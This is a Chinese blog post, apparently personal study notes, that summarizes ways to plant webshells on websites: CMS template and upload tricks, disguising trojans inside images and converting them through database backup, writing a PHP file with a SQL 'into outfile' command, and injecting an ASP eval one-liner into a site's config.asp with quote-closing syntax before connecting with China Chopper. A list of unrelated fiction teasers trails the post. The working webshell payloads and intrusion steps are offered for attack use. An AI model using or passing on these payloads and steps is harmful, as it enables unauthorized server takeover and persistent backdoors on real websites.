获取webshell的一些总结


                                   获取webshell总结

                                                                                                                          8月6号

1.CMS获取Webshell

方法:通过百度搜索引擎搜索cms网站程序名称

如:phpcms拿webshell,discuz获取webshell(通过一些模板,填ip地址的地方抓包改包,上传图片木马),phpwind拿webshell(用户等级管理插一句话,脏话过滤插一句话,模板插一句话),WordPress拿后台webshell



2.非CMS获取webshell

1)数据库备份获取webshell

例子:

南方数据企业网站系统,首先在网站后台找,看有没有数据库备份,如果有那么你就来备份,就是你把一句话插入到图片里面,再把图片备份成asp,php(看他网站是用什么写的,扩展名)。

当然还需要有后台文件上传的地方,我们要注意下(可能网站会限制扩展名,所以你要修改扩展名,比如.txt改为.jpg),并且找到文件上传的路径,用火狐的插件firebug查看网络元素,如下图:



这里其实是没有上传成功,是因为网站源代码做了检测内容,就是说你改个扩展名,虽然满足上传条件,但是内容被检测出来了(看是不是真的有图片格式)。

那么他怎么判断的呢?我们看下正常图片和不正常图片,正常图片是由一个文件头的,代表是图片文件,不正常的图片就没有。所以!我们需要伪造图片格式,怎么做呢?

我们把真正的图片和我们的一句话木马图片合并(可以使用edjpgcom.exe,把真正的图片拖到工具,然后插上一句话或者各种大马,就生成了另一个图片,图片正常显示,但是图片中包含木马,我没试过直接把一句话复制到真正的图片中过,但是好像别人成功过,然后linux里是可以直接合并两个文件的),这个时候我们上传:





有的时候,可能在




这两个地方是灰色的或是上传按钮有问题的时候,就是你上传不了,那么你可以右键->使用firebug审查元素,你可以看到框架




当我们点击提交时,我们会将文件上传到”,,/upload_other.asp”,我们就可以通过这个路径上传文件啦!

我们来到数据库备份,将数据库路径改为我们图片所在目录”../UploadFiles/20164232231339933.jpg”(不过,有的网站这个地方不可编辑,因为需要FSO权限).........这种情况下,我们可以通过firebug在html框架里面修改value值





此时我们成功备份,访问我们的shell:



2)抓包上传获取webshell(在文件上传漏洞,iis中间件漏洞,解析漏洞,JavaScript突破...中会介绍,暂时没记录)

使用burp抓包。明小子也可以用(综合上传模块,不过不怎么用了),还是使用burp吧

3)sql命令获取webshell(用Select '' into outfile 'c:/wwwtest/eval.php')

在这个dedecms中有一个生sql命令行工具模块



注:c:/wwwtest/eval.php呢,是你在网站的根目录常见一个名为eval的php文件(前提是你知道了网站目录路径,这个目录根据不同环境当然不同)

4)模板修改获取webshell

5)插入一句话获取webshell

插一句话需要注意的地方,在这个南方数据企业网站管理系统里面,你需要知道它的网站配置文件在INC目录下的config.asp文件中的(你可以去网上下载这些公开的文件,像我很简单的那个织梦,又或者是这个,down下来看看),如果这些配置文件都是写入到asp里面的,那么我们的一句话也是可以写入进去的,一保存,就写入配置文件了。

Asp一句话:

<%eval request("value")%>

但是我们这样写进去,这个页面就崩溃了。我们需要写成”%><%eval request("value")%><%’

那我们为什么要写成写成这种形式才能起到作用呢:”%><%eval request("value")%><%’

其实<%和%>是asp文件的开端和结束标志

如果我们要在配置文件的这里:const SiteName=”南方数据企业管理系统”            ‘网站名称

插入一句话木马,我们首先要闭合南方二字前的”和最开始的<%,所以我们要在一句话前面加上”%>

那么后面的<%’呢?            <%是闭合最后面的%>结束标志,’单引号是为了闭合网站名称的单引号,这样语法就不会错了!!!如图:




细心一点会发现我们的单引号之间不是有个”双引号么,不会报错么?因为这个被包含在一对闭合的单引号之间,所以不会出问题,你在后台代码去掉也没问题,那我们不去掉是因为,你在前端这样写一句话木马,是做不到去掉的,所以就让他这样放着吧

用菜刀连接,把地址写上“http://网址/inc/config.asp”,密码就是那个chopper



6)修改上传类型获取webshell

参考文章:gatarwd.iteye.com/blog/542376

https://www.webshell.ren/post-121.html

3.其他获取webshell方法(中间件:phpmyadmin,tomcat,weblogic..)

1)PhpMyadmin(管理数据库的软件)获取webshell

2)Tomcat获取webshell

3)Weblogic获取webshell

4)JBoss获取webshell

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,125评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,293评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,054评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,077评论 1 291
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,096评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,062评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,988评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,817评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,266评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,486评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,646评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,375评论 5 342
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,974评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,621评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,796评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,642评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,538评论 2 352

推荐阅读更多精彩内容